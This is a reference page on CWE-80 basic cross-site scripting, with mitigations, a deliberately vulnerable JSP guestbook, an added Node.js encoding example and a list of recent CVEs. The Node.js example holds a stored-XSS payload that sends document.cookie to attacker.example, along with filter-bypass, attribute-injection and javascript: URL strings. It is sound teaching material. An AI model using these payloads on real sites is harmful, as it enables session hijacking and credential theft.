
CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)), vulnerability class, 403 entries

403 vulnerabilities classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)). AI-generated Chinese analysis included.

CWE-80 is the basic form of cross-site scripting, a child of CWE-79: the application writes user-supplied data into a web page without neutralizing the characters ("<", ">", "&" and, inside attribute values, quotes) that the browser interprets as markup or script. Strictly it is an output-neutralization weakness rather than an input-validation one; validating input helps, but the defect is the unencoded write. An attacker gets such data into the page either through a crafted URL or form parameter that the application reflects back (reflected XSS) or through a value the application stores and later shows to other users (stored XSS, as in the guestbook example below). The injected script then runs in the victim's browser, not in the application, under the origin and session of the vulnerable site. Consequences include session hijacking, theft of credentials and other application data, and actions performed with the victim's privileges; the DeepChat entry in the list below shows how an incomplete XSS fix can be escalated to code execution in a desktop application. The primary mitigation is contextual output encoding: convert every untrusted value to its HTML entity form at the point it is written, using the encoder for the context it lands in (text node, quoted attribute value, URL, JavaScript string). Blocklist filtering of "<script>" is not a substitute, since other elements and event handlers execute script just as well. Template engines and frameworks that escape by default make this the path of least resistance, provided their raw-output constructs are not used for untrusted data. A Content Security Policy and an HttpOnly session cookie are defense in depth: they limit what an injected script can do, but they do not remove the injection.

MITRE CWE Description
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Common Consequences (1)
Scope: Confidentiality, Integrity, Availability. Technical impact: Read Application Data; Execute Unauthorized Code or Commands.
An attacker could insert special characters that are processed client-side in the context of the user's session.
Mitigations (4)
Phase: Implementation. Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities i…
Phase: Implementation. Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are i…
Phase: Implementation. With Struts, write all data from form beans with the bean's filter attribute set to true.
Phase: Implementation. To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is n…
Effectiveness: Defense in Depth
Examples (1)
In the following example, a guestbook comment is not encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.

Bad example (JSP). The stored comment text returned by e.getText() is written straight into the page body, so a comment containing <script>...</script>, or any other markup, is rendered as HTML for every visitor:

    <%@ page import="java.util.Iterator" %>
    <% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {
           Entry e = (Entry) i.next(); %>
        <p>Entry #<%= e.getId() %></p>
        <p><%= e.getText() %></p>   <%-- untrusted text, written with no output encoding --%>
    <% } %>
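As an added example that is not part of the CWE entry or of any product listed on this page: the guestbook above rendered in Node.js, first in the vulnerable shape and then with contextual output encoding, together with the two checks a practitioner wants next to it, that a blocklist filter for <script> is not a neutralization, and that URL-bearing attributes need a scheme check on top of encoding. The guestbook entries, the author and URL values, and the hosts guestbook.example and attacker.example are all constructed for this example.

```javascript
// Added example, not code from the CWE entry or from any product listed on this
// page. Runs stand-alone under Node.js; every input below is constructed.

// Encode a value for an HTML text node or a quoted attribute value. These five
// characters are the ones that can change HTML structure; encoding the quotes is
// what keeps the result safe inside attributes, not only between tags.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Constructed guestbook; entry 2 is a stored-XSS payload (attacker.example is a placeholder host).
const guestbook = [
  { id: 1, text: 'Nice site, thanks & see you' },
  { id: 2, text: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' },
];

// Vulnerable renderer: the same shape as the JSP above, e.text written as-is.
function renderGuestbookVulnerable(entries) {
  return entries.map((e) => `<p>Entry #${e.id}</p>\n<p>${e.text}</p>`).join('\n');
}

// Hardened renderer: every untrusted value is encoded at the point it is
// written into the page, with the encoder for the context it lands in.
function renderGuestbookSafe(entries) {
  return entries.map((e) => `<p>Entry #${encodeHtml(e.id)}</p>\n<p>${encodeHtml(e.text)}</p>`).join('\n');
}

// A blocklist "filter" is not a neutralization: removing <script>...</script>
// once leaves nested fragments that reassemble into a script element, and it
// does nothing about event handlers on other elements.
function filterScriptTagsNaive(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Crude oracle used only inside this example: does the output still carry a
// script element? Real verification belongs in a browser or an HTML parser.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// URL-bearing attributes need more than encoding: "javascript:alert(1)" contains
// nothing encodeHtml touches. Parse with the WHATWG URL API (which lowercases the
// scheme and strips leading whitespace) and allow only http(s).
function isSafeUrl(url) {
  try {
    const parsed = new URL(url, 'https://guestbook.example/'); // assumed site origin
    return parsed.protocol === 'https:' || parsed.protocol === 'http:';
  } catch {
    return false;
  }
}

// Author link: attribute context for title and href, text context for the body.
function renderAuthorLink(entry) {
  const href = isSafeUrl(entry.url) ? encodeHtml(entry.url) : '#';
  return `<a href="${href}" title="${encodeHtml(entry.author)}">${encodeHtml(entry.author)}</a>`;
}

// Stand-alone demonstration when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('--- vulnerable ---\n' + renderGuestbookVulnerable(guestbook));
  console.log('--- hardened ---\n' + renderGuestbookSafe(guestbook));
  console.log('--- naive filter ---\n' + filterScriptTagsNaive('<scr<script></script>ipt>alert(1)</script>'));
  console.log('--- attribute + URL ---\n' + renderAuthorLink({ author: 'mallory" onmouseover="alert(1)', url: 'javascript:alert(1)' }));
}
```

The functions return strings rather than printing, so the same checks can run in a test suite. encodeHtml covers the HTML text and quoted-attribute contexts only; a value placed inside a <script> block, an inline event handler, or a CSS property needs the encoder for that context, which is the practical reason to prefer a templating engine that escapes per context by default and to treat its raw-output constructs as a code-review flag.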
Recent CVEs classified under CWE-80 (newest first; "-" means no severity rating is given on the source page, and values marked (AI) carry the page's AI marker):

CVE ID | Title | Product | CVSS | Severity | Published
CVE-2025-66481 | DeepChat's Incomplete XSS Fix Allows RCE through Mermaid Content | deepchat | 9.7 | Critical | 2025-12-09
CVE-2025-14186 | Grandstream GXP1625 Network Status api.values.post cross site scripting | GXP1625 | 3.5 | Low | 2025-12-07
CVE-2025-66512 | Nextcloud Server vulnerable to XSS in SVG images when opened outside of Nextcloud | security-advisories | 5.4 | Medium | 2025-12-05
CVE-2025-54057 | Apache SkyWalking: Stored XSS vulnerability | Apache SkyWalking | 6.1 | - | 2025-11-27
CVE-2025-64764 | Astro is vulnerable to Reflected XSS via the server islands feature | astro | 7.1 | High | 2025-11-19
CVE-2025-58412 | Fortinet FortiADC security vulnerability | FortiADC | 4.2 | Medium | 2025-11-19
CVE-2025-11267 | VK All in One Expansion Unit <= 9.112.1 - Authenticated (Contributor+) Stored Cross-Site Scripting | VK All in One Expansion Unit | 6.4 | Medium | 2025-11-18
CVE-2025-11265 | VK All in One Expansion Unit <= 9.112.1 - Authenticated (Contributor+) Stored Cross-Site Scripting | VK All in One Expansion Unit | 6.4 | Medium | 2025-11-18
CVE-2025-8386 | AVEVA Application Server IDE Basic Cross-site Scripting | Application Server | 6.9 | Medium | 2025-11-14
CVE-2025-13180 | Bdtask/CodeCanyon Wholesale Inventory Control and Inventory Management System edit_profile cross site scripting | Wholesale Inventory Control and Inventory Management System | 3.5 | Low | 2025-11-14
CVE-2025-13178 | Bdtask/CodeCanyon SalesERP User Profile edit_profile cross site scripting | SalesERP | 3.5 | Low | 2025-11-14
CVE-2025-12753 | Chart Expert <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode | Chart Expert | 6.4 | Medium | 2025-11-11
CVE-2025-11874 | Slippy Slider – Responsive Touch Navigation Slider <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting | Slippy Slider – Responsive Touch Navigation Slider | 5.4 | Medium | 2025-11-11
CVE-2025-64187 | OctoPrint is vulnerable to XSS through Action Command Notifications and Prompts | OctoPrint | 6.1 | - | 2025-11-07
CVE-2025-33110 | IBM OpenPages Vulnerable to HTML Injection | OpenPages | 5.4 | Medium | 2025-11-06
CVE-2025-60244 | WordPress TableOn plugin <= 1.0.5.1 - Content Injection vulnerability | TableOn | 7.1 | High | 2025-11-06
CVE-2025-49398 | WordPress Easy Appointments plugin <= 3.12.14 - Content Injection vulnerability | Easy Appointments | 6.5 | Medium | 2025-11-06
CVE-2025-11745 | Ad Inserter <= 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Field | Ad Inserter – Ad Manager & AdSense Ads | 6.4 | Medium | 2025-11-05
CVE-2025-11987 | Visual Link Preview <= 2.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via visual-link-preview Shortcode | Visual Link Preview | 6.4 | Medium | 2025-11-05
CVE-2025-48884 | Galette is vulnerable to XSS through Document Type | galette | 6.1 (AI) | Medium (AI) | 2025-11-04
CVE-2025-53883 | spacewalk-java has various XSS issues on search page | Container suse manager 5.0 | 6.1 (AI) | Medium (AI) | 2025-10-30
CVE-2025-39663 | Cross Site Scripting through compromised remote site | Checkmk | 6.1 (AI) | Medium (AI) | 2025-10-30
CVE-2025-36121 | HTML Injection Vulnerability in a Specific URL Endpoint of the IBM OpenPages Application | OpenPages | 5.4 | Medium | 2025-10-27
CVE-2025-62936 | WordPress xSmart theme <= 1.2.9.4 - Content Injection vulnerability | xSmart | 4.3 | Medium | 2025-10-27
CVE-2025-62897 | WordPress WP Recipe Maker plugin < 10.1.0 - Content Injection vulnerability | WP Recipe Maker | 5.3 | Medium | 2025-10-27
CVE-2025-11823 | ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution <= 3.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode | ShopLentor – All-in-One WooCommerce Growth & Store Enhancement Plugin | 6.4 | Medium | 2025-10-25
CVE-2025-11992 | Multi Item Responsive Slider <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting | Multi Item Responsive Slider | 6.1 | Medium | 2025-10-24
CVE-2025-58970 | WordPress Doctreat theme <= 1.6.7 - Content Injection vulnerability | Doctreat | 6.3 | Medium | 2025-10-22
CVE-2025-62415 | bagisto - Cross Site Scripting (XSS) in TinyMCE Image Upload (HTML) | bagisto | 6.9 | Medium | 2025-10-16
CVE-2025-62418 | bagisto - Cross Site Scripting (XSS) in TinyMCE Image Upload (SVG) | bagisto | 6.9 | Medium | 2025-10-16

Vulnerabilities classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)) account for 403 CVEs. The CWE taxonomy describes the weakness; review the individual CVEs for product-specific impact.